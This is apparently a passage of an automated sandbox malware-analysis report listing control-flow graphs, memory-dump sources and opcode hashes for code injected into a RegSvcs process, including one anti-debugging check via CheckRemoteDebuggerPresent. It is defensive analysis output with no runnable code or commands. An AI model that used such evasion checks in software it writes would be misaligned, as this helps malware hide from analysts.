                                                  • Not Executed
                                                  control_flow_graph 3016 6eab3c0-6eab3de 3017 6eab3e0-6eab3e3 3016->3017 3018 6eab404-6eab407 3017->3018 3019 6eab3e5-6eab3ff 3017->3019 3020 6eab42a-6eab42d 3018->3020 3021 6eab409-6eab425 3018->3021 3019->3018 3023 6eab43a-6eab43d 3020->3023 3024 6eab42f-6eab439 3020->3024 3021->3020 3026 6eab43f-6eab44d 3023->3026 3027 6eab454-6eab456 3023->3027 3031 6eab466-6eab47c 3026->3031 3034 6eab44f 3026->3034 3028 6eab458 3027->3028 3029 6eab45d-6eab460 3027->3029 3028->3029 3029->3017 3029->3031 3036 6eab482-6eab48b 3031->3036 3037 6eab697-6eab6a1 3031->3037 3034->3027 3038 6eab6a2-6eab6a9 3036->3038 3039 6eab491-6eab4ae 3036->3039 3042 6eab6ab-6eab6d7 3038->3042 3043 6eab696 3038->3043 3047 6eab684-6eab691 3039->3047 3048 6eab4b4-6eab4dc 3039->3048 3046 6eab6d9-6eab6dc 3042->3046 3043->3037 3049 6eab789-6eab78c 3046->3049 3050 6eab6e2-6eab6ee 3046->3050 3047->3036 3047->3043 3048->3047 3063 6eab4e2-6eab4eb 3048->3063 3051 6eab78e-6eab7aa 3049->3051 3052 6eab7af-6eab7b2 3049->3052 3054 6eab6f9-6eab6fb 3050->3054 3051->3052 3055 6eab7b8-6eab7c7 3052->3055 3056 6eab9e7-6eab9e9 3052->3056 3059 6eab6fd-6eab703 3054->3059 3060 6eab713-6eab717 3054->3060 3073 6eab7c9-6eab7e4 3055->3073 3074 6eab7e6-6eab82a 3055->3074 3061 6eab9eb 3056->3061 3062 6eab9f0-6eab9f3 3056->3062 3064 6eab707-6eab709 3059->3064 3065 6eab705 3059->3065 3066 6eab719-6eab723 3060->3066 3067 6eab725 3060->3067 3061->3062 3062->3046 3069 6eab9f9-6eaba02 3062->3069 3063->3038 3070 6eab4f1-6eab50d 3063->3070 3064->3060 3065->3060 3072 6eab72a-6eab72c 3066->3072 3067->3072 3082 6eab672-6eab67e 3070->3082 3083 6eab513-6eab53d 3070->3083 3075 6eab72e-6eab731 3072->3075 3076 6eab743-6eab77c 3072->3076 3073->3074 3080 6eab9bb-6eab9d0 3074->3080 3081 6eab830-6eab841 3074->3081 3075->3069 3076->3055 3098 6eab77e-6eab788 3076->3098 3080->3056 3090 6eab9a6-6eab9b5 3081->3090 3091 6eab847-6eab864 3081->3091 3082->3047 3082->3063 3100 6eab668-6eab66d 3083->3100 3101 6eab543-6eab56b 3083->3101 3090->3080 3090->3081 3091->3090 3102 6eab86a-6eab960 call 6ea97d8 3091->3102 3100->3082 3101->3100 3107 6eab571-6eab59f 3101->3107 3151 6eab96e 3102->3151 3152 6eab962-6eab96c 3102->3152 3107->3100 3113 6eab5a5-6eab5ae 3107->3113 3113->3100 3115 6eab5b4-6eab5e6 3113->3115 3122 6eab5e8-6eab5ec 3115->3122 3123 6eab5f1-6eab60d 3115->3123 3122->3100 3124 6eab5ee 3122->3124 3123->3082 3125 6eab60f-6eab666 call 6ea97d8 3123->3125 3124->3123 3125->3082 3153 6eab973-6eab975 3151->3153 3152->3153 3153->3090 3154 6eab977-6eab97c 3153->3154 3155 6eab98a 3154->3155 3156 6eab97e-6eab988 3154->3156 3157 6eab98f-6eab991 3155->3157 3156->3157 3157->3090 3158 6eab993-6eab99f 3157->3158 3158->3090
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34e7ba6eb522e9370596aead148b81cfa7324fe70fde3bfda541eb221b4db39f
                                                  • Instruction ID: 815e4414527d8fd785cd575393606293104c76169871c60dc4bc2b377ce46cb8
                                                  • Opcode Fuzzy Hash: 34e7ba6eb522e9370596aead148b81cfa7324fe70fde3bfda541eb221b4db39f
                                                  • Instruction Fuzzy Hash: 80029C30B113059FDB58DB65D590BAEB7F2EF88314F248569E4069B394EB75EC82CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 888 2f97ec2-2f97f4c CheckRemoteDebuggerPresent 891 2f97f4e-2f97f54 888->891 892 2f97f55-2f97f90 888->892 891->892
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02F97F3F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4630286830.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2f90000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 32a9bdd37b2913884515341d1b9c1e7299c00e0c3c8c686a91bf3fb3a2ffede7
                                                  • Instruction ID: 1a9c639498507a3231c948cf83ee0489902b7c0925131c71078752387d08c51f
                                                  • Opcode Fuzzy Hash: 32a9bdd37b2913884515341d1b9c1e7299c00e0c3c8c686a91bf3fb3a2ffede7
                                                  • Instruction Fuzzy Hash: CA2136B1800259CFDB10DFAAC884BEEFBF4AF49310F14846AE559B7250D778A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3160 6eaec88-6eaecaa 3161 6eaecac-6eaecaf 3160->3161 3162 6eaecb1-6eaecb5 3161->3162 3163 6eaecc6-6eaecc9 3161->3163 3164 6eaf02b-6eaf066 3162->3164 3165 6eaecbb-6eaecc1 3162->3165 3166 6eaeccb-6eaecd4 3163->3166 3167 6eaecd9-6eaecdc 3163->3167 3181 6eaf068-6eaf06b 3164->3181 3165->3163 3166->3167 3168 6eaecde-6eaece7 3167->3168 3169 6eaecf2-6eaecf5 3167->3169 3173 6eaef39-6eaef42 3168->3173 3174 6eaeced 3168->3174 3170 6eaed02-6eaed05 3169->3170 3171 6eaecf7-6eaecfd 3169->3171 3176 6eaed1c-6eaed1f 3170->3176 3177 6eaed07-6eaed0a 3170->3177 3171->3170 3173->3164 3175 6eaef48-6eaef4f 3173->3175 3174->3169 3179 6eaef54-6eaef57 3175->3179 3182 6eaed21-6eaed25 3176->3182 3183 6eaed36-6eaed39 3176->3183 3177->3164 3180 6eaed10-6eaed17 3177->3180 3184 6eaef59-6eaef5d 3179->3184 3185 6eaef7e-6eaef81 3179->3185 3180->3176 3186 6eaf071-6eaf099 3181->3186 3187 6eaf2d7-6eaf2da 3181->3187 3182->3164 3188 6eaed2b-6eaed31 3182->3188 3189 6eaed3b-6eaed40 3183->3189 3190 6eaed43-6eaed46 3183->3190 3184->3164 3191 6eaef63-6eaef73 3184->3191 3194 6eaefa8-6eaefab 3185->3194 3195 6eaef83-6eaef87 3185->3195 3246 6eaf09b-6eaf09e 3186->3246 3247 6eaf0a3-6eaf0e7 3186->3247 3192 6eaf2dc-6eaf2f8 3187->3192 3193 6eaf2fd-6eaf2ff 3187->3193 3188->3183 3189->3190 3196 6eaed48-6eaed5d 3190->3196 3197 6eaed84-6eaed87 3190->3197 3199 6eaeee3-6eaeee4 3191->3199 3217 6eaef79 3191->3217 3192->3193 3201 6eaf301 3193->3201 3202 6eaf306-6eaf309 3193->3202 3204 6eaefbd-6eaefc0 3194->3204 3205 6eaefad 3194->3205 3195->3164 3203 6eaef8d-6eaef9d 3195->3203 3196->3164 3222 6eaed63-6eaed7f 3196->3222 3198 6eaed8d-6eaed90 3197->3198 3197->3199 3198->3199 3206 6eaed96-6eaed99 3198->3206 3207 6eaeee9-6eaeeec 3199->3207 3201->3202 3202->3181 3212 6eaf30f-6eaf318 3202->3212 3230 6eaefa3 3203->3230 3231 6eaedb7-6eaedbb 3203->3231 3208 6eaeffb-6eaeffe 3204->3208 3209 6eaefc2-6eaefd7 3204->3209 3214 6eaefb5-6eaefb8 3205->3214 3206->3168 3215 6eaed9f-6eaeda2 3206->3215 3207->3199 3216 6eaeeee-6eaeef1 3207->3216 3219 6eaf000-6eaf002 3208->3219 3220 6eaf005-6eaf008 3208->3220 3209->3164 3234 6eaefd9-6eaeff6 3209->3234 3214->3204 3223 6eaedb2-6eaedb5 3215->3223 3224 6eaeda4-6eaedad 3215->3224 3225 6eaeef3-6eaeef6 3216->3225 3226 6eaef01-6eaef04 3216->3226 3217->3185 3219->3220 3220->3225 3229 6eaf00e-6eaf010 3220->3229 3222->3197 3223->3231 3232 6eaeddc-6eaeddf 3223->3232 3224->3223 3225->3177 3233 6eaeefc 3225->3233 3236 6eaef0e-6eaef11 3226->3236 3237 6eaef06-6eaef09 3226->3237 3239 6eaf012 3229->3239 3240 6eaf017-6eaf01a 3229->3240 3230->3194 3231->3164 3235 6eaedc1-6eaedd1 3231->3235 3244 6eaedef-6eaedf2 3232->3244 3245 6eaede1-6eaedea 3232->3245 3233->3226 3234->3208 3235->3184 3255 6eaedd7 3235->3255 3242 6eaef13-6eaef2f 3236->3242 3243 6eaef34-6eaef37 3236->3243 3237->3236 3239->3240 3240->3161 3248 6eaf020-6eaf02a 3240->3248 3242->3243 3243->3173 3243->3179 3251 6eaee02-6eaee05 3244->3251 3252 6eaedf4-6eaedfb 3244->3252 3245->3244 3246->3212 3272 6eaf2cc-6eaf2d6 3247->3272 3273 6eaf0ed-6eaf0f6 3247->3273 3253 6eaee0f-6eaee12 3251->3253 3254 6eaee07-6eaee0a 3251->3254 3252->3224 3257 6eaedfd 3252->3257 3259 6eaee14-6eaee20 3253->3259 3260 6eaee25-6eaee28 3253->3260 3254->3253 3255->3232 3257->3251 3259->3260 3262 6eaee2a-6eaee2e 3260->3262 3263 6eaee3f-6eaee42 3260->3263 3262->3164 3266 6eaee34-6eaee3a 3262->3266 3267 6eaee52-6eaee55 3263->3267 3268 6eaee44-6eaee4d 3263->3268 3266->3263 3270 6eaeeb9-6eaeebc 3267->3270 3271 6eaee57-6eaeeb4 call 6ea97d8 3267->3271 3268->3267 3274 6eaeede-6eaeee1 3270->3274 3275 6eaeebe-6eaeed9 3270->3275 3271->3270 3276 6eaf0fc-6eaf168 call 6ea97d8 3273->3276 3277 6eaf2c2-6eaf2c7 3273->3277 3274->3199 3274->3207 3275->3274 3294 6eaf16e-6eaf173 3276->3294 3295 6eaf262-6eaf277 3276->3295 3277->3272 3296 6eaf18f 3294->3296 3297 6eaf175-6eaf17b 3294->3297 3295->3277 3302 6eaf191-6eaf197 3296->3302 3300 6eaf17d-6eaf17f 3297->3300 3301 6eaf181-6eaf183 3297->3301 3303 6eaf18d 3300->3303 3301->3303 3304 6eaf199-6eaf19f 3302->3304 3305 6eaf1ac-6eaf1b9 3302->3305 3303->3302 3306 6eaf24d-6eaf25c 3304->3306 3307 6eaf1a5 3304->3307 3312 6eaf1bb-6eaf1c1 3305->3312 3313 6eaf1d1-6eaf1de 3305->3313 3306->3294 3306->3295 3307->3305 3308 6eaf1e0-6eaf1ed 3307->3308 3309 6eaf214-6eaf221 3307->3309 3321 6eaf1ef-6eaf1f5 3308->3321 3322 6eaf205-6eaf212 3308->3322 3318 6eaf239-6eaf246 3309->3318 3319 6eaf223-6eaf229 3309->3319 3316 6eaf1c3 3312->3316 3317 6eaf1c5-6eaf1c7 3312->3317 3313->3306 3316->3313 3317->3313 3318->3306 3323 6eaf22b 3319->3323 3324 6eaf22d-6eaf22f 3319->3324 3325 6eaf1f9-6eaf1fb 3321->3325 3326 6eaf1f7 3321->3326 3322->3306 3323->3318 3324->3318 3325->3322 3326->3322
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c672443174d4f9ccd17c96be84ab7acb8348af9d6b2b2864773b2a155fadebe
                                                  • Instruction ID: 8c012cc6e4edad6a377a5373153e948dbf5675acc2b706d1b51fffb399a185e1
                                                  • Opcode Fuzzy Hash: 4c672443174d4f9ccd17c96be84ab7acb8348af9d6b2b2864773b2a155fadebe
                                                  • Instruction Fuzzy Hash: 8D025970E003098FEBA4DF68D5806ADB7B2EF85314F24956AE416EF241DB35EC85CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3536 6eae310-6eae32e 3537 6eae330-6eae333 3536->3537 3538 6eae33d-6eae340 3537->3538 3539 6eae335-6eae33a 3537->3539 3540 6eae342-6eae34f 3538->3540 3541 6eae354-6eae357 3538->3541 3539->3538 3540->3541 3542 6eae52d-6eae536 3541->3542 3543 6eae35d-6eae360 3541->3543 3547 6eae3cc-6eae3d5 3542->3547 3548 6eae53c-6eae546 3542->3548 3545 6eae362-6eae366 3543->3545 3546 6eae371-6eae374 3543->3546 3545->3548 3553 6eae36c 3545->3553 3549 6eae38e-6eae391 3546->3549 3550 6eae376-6eae389 3546->3550 3551 6eae3db-6eae3df 3547->3551 3552 6eae547-6eae57e 3547->3552 3554 6eae393-6eae39c 3549->3554 3555 6eae3a1-6eae3a4 3549->3555 3550->3549 3556 6eae3e4-6eae3e6 3551->3556 3566 6eae580-6eae583 3552->3566 3553->3546 3554->3555 3558 6eae3a6-6eae3c2 3555->3558 3559 6eae3c7-6eae3ca 3555->3559 3561 6eae3e8 3556->3561 3562 6eae3ed-6eae3f0 3556->3562 3558->3559 3559->3547 3559->3556 3561->3562 3562->3537 3563 6eae3f6-6eae41a 3562->3563 3579 6eae52a 3563->3579 3580 6eae420-6eae42f 3563->3580 3568 6eae590-6eae593 3566->3568 3569 6eae585-6eae589 3566->3569 3572 6eae5b6-6eae5b9 3568->3572 3573 6eae595-6eae5b1 3568->3573 3570 6eae58b 3569->3570 3571 6eae5e1-6eae61c 3569->3571 3570->3568 3585 6eae80f-6eae822 3571->3585 3586 6eae622-6eae62e 3571->3586 3576 6eae5bb-6eae5c5 3572->3576 3577 6eae5c6-6eae5c9 3572->3577 3573->3572 3582 6eae5cb 3577->3582 3583 6eae5d8-6eae5db 3577->3583 3579->3542 3595 6eae431-6eae437 3580->3595 3596 6eae447-6eae482 call 6ea97d8 3580->3596 3661 6eae5cb call 6eae868 3582->3661 3662 6eae5cb call 6eae871 3582->3662 3663 6eae5cb call 6eae874 3582->3663 3583->3571 3584 6eae844-6eae846 3583->3584 3587 6eae848 3584->3587 3588 6eae84d-6eae850 3584->3588 3590 6eae824 3585->3590 3597 6eae64e-6eae692 3586->3597 3598 6eae630-6eae649 3586->3598 3587->3588 3588->3566 3594 6eae856-6eae860 3588->3594 3601 6eae825 3590->3601 3592 6eae5d1-6eae5d3 3592->3583 3599 6eae43b-6eae43d 3595->3599 3600 6eae439 3595->3600 3613 6eae49a-6eae4b1 3596->3613 3614 6eae484-6eae48a 3596->3614 3615 6eae6ae-6eae6ed 3597->3615 3616 6eae694-6eae6a6 3597->3616 3598->3590 3599->3596 3600->3596 3601->3601 3627 6eae4c9-6eae4da 3613->3627 3628 6eae4b3-6eae4b9 3613->3628 3617 6eae48e-6eae490 3614->3617 3618 6eae48c 3614->3618 3622 6eae6f3-6eae7ce call 6ea97d8 3615->3622 3623 6eae7d4-6eae7e9 3615->3623 3616->3615 3617->3613 3618->3613 3622->3623 3623->3585 3634 6eae4dc-6eae4e2 3627->3634 3635 6eae4f2-6eae523 3627->3635 3630 6eae4bb 3628->3630 3631 6eae4bd-6eae4bf 3628->3631 3630->3627 3631->3627 3637 6eae4e6-6eae4e8 3634->3637 3638 6eae4e4 3634->3638 3635->3579 3637->3635 3638->3635 3661->3592 3662->3592 3663->3592
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa7aa08c2cd47af1b456680d69bae95800187b363ede1c378c532f0edd17d35b
                                                  • Instruction ID: 17709da13e277643c38e7f51924cc1ab48aef2bc53d2a4e51fc5bae3cc283973
                                                  • Opcode Fuzzy Hash: aa7aa08c2cd47af1b456680d69bae95800187b363ede1c378c532f0edd17d35b
                                                  • Instruction Fuzzy Hash: 3FE18F30E1030A8FDB65DF69D8906AEB7B2EF89304F209529D5069F344EB34EC46CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3664 6ea801b-6ea8034 3666 6ea803a-6ea8041 3664->3666 3667 6ea831c-6ea8323 3664->3667 3666->3667 3668 6ea8047-6ea8053 3666->3668 3669 6ea8329-6ea8330 3667->3669 3670 6ea84ae-6ea8523 3667->3670 3675 6ea805d-6ea8073 3668->3675 3669->3670 3672 6ea8336-6ea8480 3669->3672 3716 6ea848e 3672->3716 3717 6ea8482 3672->3717 3681 6ea8078-6ea82bb 3675->3681 3682 6ea8075 3675->3682 3738 6ea82bd-6ea82d5 3681->3738 3739 6ea82d7-6ea82f3 3681->3739 3682->3681 3716->3670 3717->3716 3741 6ea82f5-6ea8308 3738->3741 3740 6ea830a-6ea830e 3739->3740 3739->3741 3743 6ea8319-6ea831a 3740->3743 3744 6ea8310 3740->3744 3741->3740 3743->3667 3744->3743
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df1327870de526ea5c62bb401ca422834b997aea6bab155fa6d41a7d7a768505
                                                  • Instruction ID: 6706d275f87a2dc81b534a689a2c51bc03e7031673c0fc91cd59c5130b70e20a
                                                  • Opcode Fuzzy Hash: df1327870de526ea5c62bb401ca422834b997aea6bab155fa6d41a7d7a768505
                                                  • Instruction Fuzzy Hash: 67D14D30B50219DFDB54DF68D854BAE7BB6FF88700F2084A9E5099F395CA75AC468F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: accffb3c789fe3dd3ad4ca9e41a654238ae31a7a2a90bdd08c051ca37613dbce
                                                  • Instruction ID: 69aae5bfd2bbb3497dde7d847c87acf3adb327382261185d59613cc5b8228c0d
                                                  • Opcode Fuzzy Hash: accffb3c789fe3dd3ad4ca9e41a654238ae31a7a2a90bdd08c051ca37613dbce
                                                  • Instruction Fuzzy Hash: 5CA18230F013098BEFA4DA99D4947AE7BB7EF89314F245425E409EF385DA34EC819B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3dd23168f05d83b1cc99c8e0c2043713841882e874bbfd579da954ec8c618ff1
                                                  • Instruction ID: b715a65ed044ea2d24e81a82a12c2231f2bbf823c3a85ec900241d9c88ff8f9b
                                                  • Opcode Fuzzy Hash: 3dd23168f05d83b1cc99c8e0c2043713841882e874bbfd579da954ec8c618ff1
                                                  • Instruction Fuzzy Hash: DDA18230E013098BEF64DA99D4947AE7BB7FF89314F245425E409EF385CA34EC819B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4395 6eaec87-6eaecaa 4397 6eaecac-6eaecaf 4395->4397 4398 6eaecb1-6eaecb5 4397->4398 4399 6eaecc6-6eaecc9 4397->4399 4400 6eaf02b-6eaf066 4398->4400 4401 6eaecbb-6eaecc1 4398->4401 4402 6eaeccb-6eaecd4 4399->4402 4403 6eaecd9-6eaecdc 4399->4403 4417 6eaf068-6eaf06b 4400->4417 4401->4399 4402->4403 4404 6eaecde-6eaece7 4403->4404 4405 6eaecf2-6eaecf5 4403->4405 4409 6eaef39-6eaef42 4404->4409 4410 6eaeced 4404->4410 4406 6eaed02-6eaed05 4405->4406 4407 6eaecf7-6eaecfd 4405->4407 4412 6eaed1c-6eaed1f 4406->4412 4413 6eaed07-6eaed0a 4406->4413 4407->4406 4409->4400 4411 6eaef48-6eaef4f 4409->4411 4410->4405 4415 6eaef54-6eaef57 4411->4415 4418 6eaed21-6eaed25 4412->4418 4419 6eaed36-6eaed39 4412->4419 4413->4400 4416 6eaed10-6eaed17 4413->4416 4420 6eaef59-6eaef5d 4415->4420 4421 6eaef7e-6eaef81 4415->4421 4416->4412 4422 6eaf071-6eaf099 4417->4422 4423 6eaf2d7-6eaf2da 4417->4423 4418->4400 4424 6eaed2b-6eaed31 4418->4424 4425 6eaed3b-6eaed40 4419->4425 4426 6eaed43-6eaed46 4419->4426 4420->4400 4427 6eaef63-6eaef73 4420->4427 4430 6eaefa8-6eaefab 4421->4430 4431 6eaef83-6eaef87 4421->4431 4482 6eaf09b-6eaf09e 4422->4482 4483 6eaf0a3-6eaf0e7 4422->4483 4428 6eaf2dc-6eaf2f8 4423->4428 4429 6eaf2fd-6eaf2ff 4423->4429 4424->4419 4425->4426 4432 6eaed48-6eaed5d 4426->4432 4433 6eaed84-6eaed87 4426->4433 4435 6eaeee3-6eaeee4 4427->4435 4453 6eaef79 4427->4453 4428->4429 4437 6eaf301 4429->4437 4438 6eaf306-6eaf309 4429->4438 4440 6eaefbd-6eaefc0 4430->4440 4441 6eaefad 4430->4441 4431->4400 4439 6eaef8d-6eaef9d 4431->4439 4432->4400 4458 6eaed63-6eaed7f 4432->4458 4434 6eaed8d-6eaed90 4433->4434 4433->4435 4434->4435 4442 6eaed96-6eaed99 4434->4442 4443 6eaeee9-6eaeeec 4435->4443 4437->4438 4438->4417 4448 6eaf30f-6eaf318 4438->4448 4466 6eaefa3 4439->4466 4467 6eaedb7-6eaedbb 4439->4467 4444 6eaeffb-6eaeffe 4440->4444 4445 6eaefc2-6eaefd7 4440->4445 4450 6eaefb5-6eaefb8 4441->4450 4442->4404 4451 6eaed9f-6eaeda2 4442->4451 4443->4435 4452 6eaeeee-6eaeef1 4443->4452 4455 6eaf000-6eaf002 4444->4455 4456 6eaf005-6eaf008 4444->4456 4445->4400 4470 6eaefd9-6eaeff6 4445->4470 4450->4440 4459 6eaedb2-6eaedb5 4451->4459 4460 6eaeda4-6eaedad 4451->4460 4461 6eaeef3-6eaeef6 4452->4461 4462 6eaef01-6eaef04 4452->4462 4453->4421 4455->4456 4456->4461 4465 6eaf00e-6eaf010 4456->4465 4458->4433 4459->4467 4468 6eaeddc-6eaeddf 4459->4468 4460->4459 4461->4413 4469 6eaeefc 4461->4469 4472 6eaef0e-6eaef11 4462->4472 4473 6eaef06-6eaef09 4462->4473 4475 6eaf012 4465->4475 4476 6eaf017-6eaf01a 4465->4476 4466->4430 4467->4400 4471 6eaedc1-6eaedd1 4467->4471 4480 6eaedef-6eaedf2 4468->4480 4481 6eaede1-6eaedea 4468->4481 4469->4462 4470->4444 4471->4420 4491 6eaedd7 4471->4491 4478 6eaef13-6eaef2f 4472->4478 4479 6eaef34-6eaef37 4472->4479 4473->4472 4475->4476 4476->4397 4484 6eaf020-6eaf02a 4476->4484 4478->4479 4479->4409 4479->4415 4487 6eaee02-6eaee05 4480->4487 4488 6eaedf4-6eaedfb 4480->4488 4481->4480 4482->4448 4508 6eaf2cc-6eaf2d6 4483->4508 4509 6eaf0ed-6eaf0f6 4483->4509 4489 6eaee0f-6eaee12 4487->4489 4490 6eaee07-6eaee0a 4487->4490 4488->4460 4493 6eaedfd 4488->4493 4495 6eaee14-6eaee20 4489->4495 4496 6eaee25-6eaee28 4489->4496 4490->4489 4491->4468 4493->4487 4495->4496 4498 6eaee2a-6eaee2e 4496->4498 4499 6eaee3f-6eaee42 4496->4499 4498->4400 4502 6eaee34-6eaee3a 4498->4502 4503 6eaee52-6eaee55 4499->4503 4504 6eaee44-6eaee4d 4499->4504 4502->4499 4506 6eaeeb9-6eaeebc 4503->4506 4507 6eaee57-6eaeeb4 call 6ea97d8 4503->4507 4504->4503 4510 6eaeede-6eaeee1 4506->4510 4511 6eaeebe-6eaeed9 4506->4511 4507->4506 4512 6eaf0fc-6eaf168 call 6ea97d8 4509->4512 4513 6eaf2c2-6eaf2c7 4509->4513 4510->4435 4510->4443 4511->4510 4530 6eaf16e-6eaf173 4512->4530 4531 6eaf262-6eaf277 4512->4531 4513->4508 4532 6eaf18f 4530->4532 4533 6eaf175-6eaf17b 4530->4533 4531->4513 4538 6eaf191-6eaf197 4532->4538 4536 6eaf17d-6eaf17f 4533->4536 4537 6eaf181-6eaf183 4533->4537 4539 6eaf18d 4536->4539 4537->4539 4540 6eaf199-6eaf19f 4538->4540 4541 6eaf1ac-6eaf1b9 4538->4541 4539->4538 4542 6eaf24d-6eaf25c 4540->4542 4543 6eaf1a5 4540->4543 4548 6eaf1bb-6eaf1c1 4541->4548 4549 6eaf1d1-6eaf1de 4541->4549 4542->4530 4542->4531 4543->4541 4544 6eaf1e0-6eaf1ed 4543->4544 4545 6eaf214-6eaf221 4543->4545 4557 6eaf1ef-6eaf1f5 4544->4557 4558 6eaf205-6eaf212 4544->4558 4554 6eaf239-6eaf246 4545->4554 4555 6eaf223-6eaf229 4545->4555 4552 6eaf1c3 4548->4552 4553 6eaf1c5-6eaf1c7 4548->4553 4549->4542 4552->4549 4553->4549 4554->4542 4559 6eaf22b 4555->4559 4560 6eaf22d-6eaf22f 4555->4560 4561 6eaf1f9-6eaf1fb 4557->4561 4562 6eaf1f7 4557->4562 4558->4542 4559->4554 4560->4554 4561->4558 4562->4558
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 189a70820daae49dc9eca0ea65d746cead22f974ea3b5f331a2b7f03b35ac77d
                                                  • Instruction ID: 3748a62d62aa4767f5f12bcbef414f4dcf5ff526ea440ae61a519f15c641b554
                                                  • Opcode Fuzzy Hash: 189a70820daae49dc9eca0ea65d746cead22f974ea3b5f331a2b7f03b35ac77d
                                                  • Instruction Fuzzy Hash: 27A13870E113098BEFA4CB68D5C07ADB7B1EB89318F24A526E449DF341D635EC81DBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 809c21efeca5d3485d2ac40d1bbdb143e7d25c64bf7044b0f707ba2219a1fc49
                                                  • Instruction ID: fd3e646e363f611c57cf7741681b8e31a5bcbc8b4532e47ecfd4b4e251d3ab2d
                                                  • Opcode Fuzzy Hash: 809c21efeca5d3485d2ac40d1bbdb143e7d25c64bf7044b0f707ba2219a1fc49
                                                  • Instruction Fuzzy Hash: 9CA15D70F023158FDB59DF74C8507AEB7B2EF89304F2085A9D409AB345DA35AD86CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13a714826fae2ff0977f59eee32d756a9455aaa7e38ec1bc91d80e4c18b58b39
                                                  • Instruction ID: fae4e4032e633626db5c87e51ca2db65f9415e466368b795fe02753ecd9717b2
                                                  • Opcode Fuzzy Hash: 13a714826fae2ff0977f59eee32d756a9455aaa7e38ec1bc91d80e4c18b58b39
                                                  • Instruction Fuzzy Hash: 73A15730A103148FDB64DB68D588AADB7F2EF88315F549869E44AAF390DB35EC45CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
